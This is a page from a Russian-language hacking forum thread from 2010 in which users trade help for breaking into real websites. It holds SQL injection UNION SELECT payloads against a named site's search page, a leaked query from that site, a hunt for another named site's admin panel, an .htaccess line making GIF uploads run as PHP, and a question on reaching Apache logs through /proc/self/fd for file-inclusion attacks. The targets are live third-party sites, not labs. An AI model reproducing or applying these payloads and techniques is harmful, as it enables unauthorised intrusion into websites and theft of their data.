Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

06.04.2010, 01:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
Сообщение от Gorev
в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?
обходиться без функций и подзапросов, кеп ! или попробывать заюзать более продвинутую кодировку %28 %29
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|

06.04.2010, 16:51
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме: 52455
Репутация:
18
|
|
Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/*
Выплевовает ошибку
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/search_result.php on line 474
SELECT Profiles.ID, Headline, Country, Occupation, City, Sex, Sex2, ProfileType, NickName, Children, LEFT( DescriptionMe, 180 ) AS DescriptionMe, LEFT( DescriptionYou, 100 ) AS DescriptionYou, DateOfBirth, DateOfBirth2, Pic_0_addon, ExtraAddons, Sound, (LastNavTime > SUBDATE(NOW(), INTERVAL 5 MINUTE)) as is_onl FROM Profiles WHERE is_spamer <> '2' AND (LookingFor = 'female' OR LookingFor = 'both') AND (IF('both'='both' or 'both'='couple',1,Sex='both')) AND (IF('both'='couple',ProfileType='couple',ProfileTy pe!='couple')) AND (TO_DAYS(DateOfBirth) BETWEEN TO_DAYS('1934-04-06') AND (TO_DAYS('1992-04-06')+1)) AND (Country IN (-1,13 order by 1/*)) AND Status = 'Active' ORDER BY Priority DESC, Priority DESC, Profiles.LastLoggedIn DESC LIMIT 0, 15
Как обойти? Я новичек, посоветуйте плз.
|
|
|

06.04.2010, 18:30
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
Сообщение от auth_root
Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/*
Выплевовает ошибку
Как обойти? Я новичек, посоветуйте плз.
&country=-1)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
и на всякий случай
&country=-1)) and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Последний раз редактировалось budden; 06.04.2010 в 18:32..
|
|
|

06.04.2010, 18:54
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме: 52455
Репутация:
18
|
|
Сообщение от budden
&country=-1)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
и на всякий случай
&country=-1)) and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
budden пробовал закрывать скобки уже, не катит.and 1=0 тут не причём, тем более если &country=-1, можно просто 99999999 или +limit+1,1 (так тоже принтабельные можно вывести) но не в этом случае. Т.к. поля подобрать всё равно не представлется возможным. Подзапросы юзать наверное тоже не выйдет, я просто не пойму как обрезать запрос...
|
|
|

06.04.2010, 20:20
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Не могу найти админку: http://www.yellowbulletin.com/
MS SQL
сканером: security-digger.org
не получается.
|
|
|

06.04.2010, 21:28
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
Сообщение от FlaktW
Не могу найти админку: http://www.yellowbulletin.com/
вроде http://www.yellowbulletin.com/cp/ но чета белое все
|
|
|

06.04.2010, 21:41
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме: 698831
Репутация:
34
|
|
есть возможность залить htaccess через админ-панель. как сделать так, чтобы сервер воспринимал gif-картинки как php-скрипты ?
|
|
|

06.04.2010, 21:50
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме: 46117
Репутация:
76
|
|
Сообщение от daniel_1024
есть возможность залить htaccess через админ-панель. как сделать так, чтобы сервер воспринимал gif-картинки как php-скрипты ?
AddType application/x-httpd-php .gif
Последний раз редактировалось Sc0rpi0n; 05.06.2010 в 01:43..
|
|
|

06.04.2010, 21:53
|
|
Познающий
Регистрация: 13.08.2007
Сообщений: 37
Провел на форуме: 232729
Репутация:
1
|
|
Как думаете, реально раскрутить?
http://starosti.ru/archive.php?m=10&y=1909'
|
|
|

06.04.2010, 22:41
|
|
Новичок
Регистрация: 06.04.2010
Сообщений: 4
Провел на форуме: 15208
Репутация:
0
|
|
Скажите от чего зависит цифра в имени ссылки на лог апача?
/proc/self/fd/2
/proc/self/fd/11
мне нужно чтоб при инклуде сразу добраться до логов.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|